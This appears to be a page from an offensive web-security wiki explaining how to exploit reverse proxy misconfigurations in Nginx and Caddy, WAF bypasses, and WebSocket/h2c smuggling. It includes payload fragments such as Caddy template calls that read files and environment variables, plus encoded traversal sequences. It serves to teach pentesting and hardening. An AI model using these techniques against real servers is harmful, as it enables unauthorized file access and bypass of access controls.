Reverse Proxies
Servers on top of web applications that route traffic, manage headers and more
Last updated
Servers on top of web applications that route traffic, manage headers and more
Last updated
All directives in Nginx are explained in this list:
The /etc/nginx/nginx.conf
file contains the global configuration, as well as a line to include all configuration files in the /etc/nginx/conf.d/
folder.
Because these are nested in a http {}
context, these files will not have to open it again. You will often see extra options for the http
context be added here, as well as server {}
definitions per application.
Below are some common security misconfigurations that can allow for specific attacks.
One classic trick in Nginx is an "off-by-slash" misconfiguration where two conditions meet:
location
is missing a trailing slash
a directive like alias
or proxy_pass
with a trailing slash
The example below contains the vulnerability twice:
The problem is that location /static
will match any path starting with /static
, also /staticANYTHING
or /static../anything
. What Nginx does after is remove this prefix, then continue with the leftover path. This may now be ../anything
, and when appended to the static/
folder or v1/
backend, it can traverse one directory back.
This will create the path /app/static/../index.php
, which may leak the sensitive source code in /app/index.php
. Same idea with the proxy_pass
, it could be used to access an unintended directory on the backend intended for debugging, other versions, of even another application.
You may find a backend application vulnerable to Path Traversal using the request path, but can't get ../
sequences through to it due to an overlaying Nginx proxy which throws 400 Bad Request's whenever you traverse past the root path. For example:
/../../anything
-> Bad Request
/deep/path/../../anything
-> OK
/deep/path/../../../anything
-> Bad Request
If you're lucky, the merge_slashes
is set off of its default value to off
. In this case, Nginx will not normalize multiple slashes (eg. //
) before performing this check, allowing you to make it think you are in a very deep path. Then when the vulnerable application receives the URI and uses it in a file path, the multiple slashes will be merged and turn into only a single one, allowing you to traverse past the root. Below is an example:
Note: If the vulnerable endpoint is somewhere deeper in a directory, you can already path traversal as deep as you are from the root path. As seen in the examples above, with /deep/path
you can still traverse 2 directories up without being blocked. No need for merge_slashes off;
in that case.
Nginx will perform normalization before matching location
directives. Specifically, it will URL-decode the path and then resolve any ../
sequences, as well as Merge Slashes. After doing so, it will check if the path starts with /api
:
The URL-decoded version is even sent through to the backend, making it possible to cause some strange URLs to be interpreted in unexpected ways.
/api/../anything
/anything
Doesn't match /api
/anything/../api
/api
/anything/../api
/api%2Fanything
/api/anything
/api/anything
/anything%2f..%2fapi
/api
/anything/../api
When dealing with multiple layers of proxies, it may be possible to make one proxy think the path is using one prefix, while the other proxy sees a different prefix, applying rules and routing accordingly.
The rewrite
directive will take the normalized value, but also URL-decode the path one more time. Take the following example:
While this configuration would normally restrict the backend to the /api
directory, the rewrite causes an extra URL decoding operation. This allows %252f
which isn't recognized during Nginx's normalization to turn into a real /
for the backend.
After rewriting, nginx will rewrite it to the following path, which the backend may interpret as /anything
, escaping the /api/
directory:
While testing for these kinds of vulnerabilities in a black-box, you should test on all subdirectories. Different location
directives may have different rules. Look out for slightly different response bodies or headers to differentiate them.
A surprising amount of sinks in Nginx also accept decoded carriage return and newline characters (\r\n
). If a variable with this raw character is passed to such a vulnerable sink, you can inject headers into requests or responses.
First, you need to get some variable with raw \r\n
characters. One commonly used is $uri
, containing the decoded path. If your path contains %0d%0a
characters, these will be decoded and put into the variable.
Another method is using Regular Expressions (RegEx) in a location to match a specific part of the URI. The value matched in a location
directive will be URL-decoded as we learned earlier, so any matching part (like $1
) will be as well. Importantly, a .
cannot contain newlines, even though it should match any character. This is because of the missing DOTALL flag by default. But still, a negated character set (eg. [^abc]
) may contain newlines!
To exploit this, you can inject the encoded characters into the matching group which will be decoded in the backend request:
When raw characters end up in an add_header
, you can add more headers below that header to the response. See the example above.
Another interesting case is when return
returns a redirect using the Location:
header, because it is also vulnerable to CRLF-Injection:
By fitting the regex format, the /html/$1.html
path becomes a location header with CRLF:
Check out Header / CRLF Injection to learn how to exploit this for XSS.
Lastly, the Cache-Control:
header may come in useful if you want to poison/deceive the cache.
When unescaped characters fall into proxy_pass
paths or proxy_set_header
values, you can inject request header. This works similarly to Response Headers, but the exploitation is wildly different.
Above the $uri
variable is insecurely put into a header value. The X-Internal-Header
is also stripped from our request, presumably because the application doesn't want to user to control this.
By injecting with a CRLF in the path, however, we can still send this header to the backend:
This can be useful for controlling internal headers, or spoofing trusted values like X-Client-IP
.
By injecting two CRLF sequences, you can even end the previous HTTP request to perform HTTP Request Smuggling. If Nginx keeps the connection to the backend open, you can inject into this queue to send raw requests that wouldn't normally be allowed, desynchronize other users, or leak internal headers by playing around with the Content-Length:
.
Importantly, the above is often possible through just a specific path. You can make a victim visit this in their browser to poison their own connection, creating a client-side desync.
Nginx understands some special headers from the backend when proxying using proxy_pass
. To demonstrate this, see the following configuration:
The backend needs to have a feature or vulnerability that allows you to inject arbitrary response headers. This is also common with SSRF to an attacker's server.
The X-Accel-Redirect
response header will rewrite the URL, and perform another evaluation and respond with that instead. If we set its value to /internal
, the handler for location /internal
will be used even though the requested path is still /
. It bypasses the internal;
check which would normally not be possible by requesting it remotely.
Some more internal headers you can use in combination with this are (source):
X-Accel-Charset
: set the Content-Type:
's charset to the given value
X-Accel-Buffering
: enables or disabled buffering of the response
X-Accel-Limit-Rate
: Bytes per second to send to the client
X-Accel-Expires
: When to expire the cache for this response
The main Caddyfile
controls the configuration of the proxy. You can best learn it from looking at examples online, as the documentation can be limited for some features.
There are two types of templating in Caddy. Firstly, there is the {...}
syntax enabled by default in the source code of your Caddyfile
:
These are called placeholders and are documented below:
When the templates
directive is set, the response will be evaluated as a template. Below is an example where this would be useful:
All accessible properties and functions are documented here:
Internally, it uses Go's text/template
to evaluate the {{...}}
syntax. Importantly this is evaluated after placeholders. That means if a placeholder contains user-input, and is put into a response, the user input will be evaluated as a template! This allows you to call dangerous functions like:
{{env "VAR_NAME"}}
: Gets an environment variable
{{listFiles "/"}}
: List all files in a directory (relative to configured root)
{{readFile "path/to/file"}}
: Read a file (relative to configured root)
The code below is vulnerable because it puts a placeholder value in the response, while the response template
directive is used:
With a payload like the following, you can read arbitrary files:
In case your character set is limited (eg. you cannot use quotes), it is possible to read strings from other variables such as .Req.URL.RawQuery
or an index of .Req.Header.
:
As an alternative to quotes, you can also use backtics (`
) to create inline strings.
Some generic techniques for reverse proxies that act as Web Application Firewalls to block certain dangerous requests. This often includes blocking attack-like syntax such as ' OR 1=1;--
or marking certain paths as "internal only".
If it is trying to block a certain path from being accessed, such as /admin
, you may be able to obfuscate it so that the reverse proxy doesn't recognize it anymore while the application still does.
In Nginx, for example, if you make a location = ...
rule the normalized path needs to exactly match the given location for the rule to trigger. By adding any byte to the end of the path, it won't be recognized anymore. Most applications still understand some special bytes as suffixes. The research below explores this in various different servers:
This should prevent access to the /admin
endpoint, but if we define a handler for it in Express.js, you can bypass it by adding the byte \x85
to the end of your path:
Caddy also has a way to block certain paths:
In versions < 2.4.6, this path was a literal equals check, meaning it was simply bypassable using:
Other combinations of this using ../
and encoded %2e%2e%2f
sequences may help confuse the proxy and the backend.
If you want to communicate with the backend directly without the proxy in the way, you may be able to confuse the proxy into thinking you are speaking a binary protocol so that it doesn't try and interfere anymore. While you have such a connection with the backend, you can send it arbitrary HTTP requests and receive raw responses.
There are two techniques for this, the first involving WebSockets. To full understand the attack, read the README in this repository:
Setting up a WebSocket connection typically goes like this:
Client sends an HTTP GET request with Upgrade: websocket
, Sec-WebSocket-Version: 13
and Sec-WebSocket-Key: <SOME_NONCE>
headers
Proxy forwards this request to the backend
Backend implements websockets for the requested endpoint, so it returns a 101
status code with a Sec-WebSocket-Accept:
header derived from the nonce
Proxy recognizes the status code and sees it is a successful WebSocket connection, so it switches the state of this TCP connection to allow binary data passthrough
Client and Backend can now directly communicate over WebSocket frames
An issue occurs when Proxy does not check the response status code, instead it uses some other heuristic like the response headers to determine that a WebSocket connection was established. If the connection was unsuccessful in reality (like due to a wrong Sec-WebSocket-Version: 1337
header), the backend still wants HTTP requests.
At this point the proxy has switched for forwarding raw TCP, because it thinks the connection is speaking WebSocket frames. But in reality the client can now send HTTP requests to the backend and receive raw responses, bypassing the proxy.
For other types of proxies that do check the status code, you may still be able to confuse them by returning that correct status code through an SSRF or other mechanism that allows you to set it to 101. This can create another scenario where the proxy thinks the connection switched to WebSocket frames, and the content isn't checked.
So, by sending the backend to your server and returning a status code 101 response, which it reflects, the proxy will think a WebSocket connection has been established. Now the client can send arbitrary HTTP requests again over this connection because the proxy expects binary WebSocket frames. The backend still expects HTTP and will respond directly.
There is another protocol we can Upgrade:
to, named h2c
or "HTTP/2 cleartext". This name is because regularly, HTTP/2 is only available using encrypted TLS because it is negotiated during the handshake. However, an alternative was made where a regular HTTP/1.1 connection can be upgraded to HTTP/2 using a request like the following:
The rest of the messages will now go over HTTP/2's binary protocol.
When a Proxy is in the way, it will only expect an h2c upgrade when communication is cleartext (no TLS). But what if we do it on TLS anyway?
The answer to that question is what is answered in the following post and leads to this attack:
It turns out that proxies who forward the upgrade headers to the backend, will receive the 101 Switching Protocols response, and proceed to set up a binary tunnel between the client and the server. Since it speaks HTTP/2 now, the proxy won't look at it anymore and you as the client can send arbitrary requests to the backend and receive raw responses.
Note that the backend server has to support h2c upgrades for this to work, which is often a manual setting. The tool below can test and exploit this easily given a URL:
With the Location:
header case, this becomes more tricky because you cannot simply overwrite the response and expect the browser to render it. Often there is a prefix in the location header before your input, and then there is no way to get XSS.
As an alternative, you can still set the Set-Cookie:
header which is allowed during redirects. This allows you to set arbitrary cookies, becoming a gadget.